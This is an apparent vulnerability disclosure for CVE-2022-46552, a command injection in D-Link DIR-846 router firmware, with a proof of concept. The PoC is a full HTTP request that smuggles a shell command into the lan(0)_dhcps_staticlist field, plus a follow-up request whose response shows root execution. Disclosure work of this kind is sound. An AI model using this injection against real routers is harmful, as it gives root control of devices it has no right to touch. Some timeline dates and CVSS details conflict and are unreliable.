CVE-2022–46552 | D-Link DIR-846 Wireless Router in firmware FW100A53DBR-Retail has a vulnerability that lead to a RCE
Cybersecurity presents itself as a crucial area in the Information Technology sector. Thus, incidents in this sector could cause economic disruption, financial losses, geopolitical tensions, and social instability. In addition, since December 2019, due to mobility restrictions imposed by the COVID-19 pandemic, several companies have started extending remote work.
However, working from home expands the constraint on corporate networks, exposing digital assets to new threats and vulnerabilities. Consequently, the attack surface presents an increasing pattern. Furthermore, access to private networks is usually via electronic equipment, known as small-office and home-office (SOHO) routers, potentially livelier than corporate solutions.
In this context, we found CVE-2022–46552 | D-Link DIR-846 Wireless Router in firmware FW100A53DBR-Retail has a vulnerability that leads to an RCE.
Authors
This research project has been conducted by Lab-C2DC — Laboratory of Command and Control and Cyber-security at ITA.
Lourenço Alves Pereira Junior;
Françoa Taffarel Rosário Corrêa.
Vulnerability Description: D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.
Authors: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.
Affiliation: Aeronautics Institute of Technology (ita.br)
Common Weakness Enumeration: CWE-78 — Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
Vendor of the product: D-LINK
Affected product: DIR-846
Affected Version: Firmware DIR846enFW100A53DBR-Retail
Vulnerability Score V3.1: [9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H&version=3.1)
The detail of vulnerability: The exploitation method corresponds to an injection command through a authenticated user input with special characters. In this case, the file SetIpMacBindSettings.php (line 79) contains an exec function with a partially sanitized user input. Thus, an attacker can execute arbitrary commands by sending a maliciously crafted payload through a POST request. The HTTP message content is JSON-encoded and has the lan(0)_dhcps_staticlist key, a string with comma-separated values. Therefore, the attacker must insert the malicious payload in the second value, leading the web server in the D-Link DIR-846 to invoke exec(changename.sh $mac "$(malicious_payload_command)") on the host system.
Dates info:
Vulnerability discover: 30/11/2022
First try contact with vendor: 01/12/2022
Request CVE ID (MITRE): 01/12/2022
Date Record Created (MITRE): 05/12/2022
First vendor response: 08/12/2022
CVE Assignment Team response: 10/01/2023
Second try contact with vendor: 01/12/2022
CVE published in the CVE List: 02/02/2022
2. Proof of Concept
Malicious POST Request
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}First Response
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}Getting Data from RCE Request
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1Second Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35
uid=0(root) gid=0(root)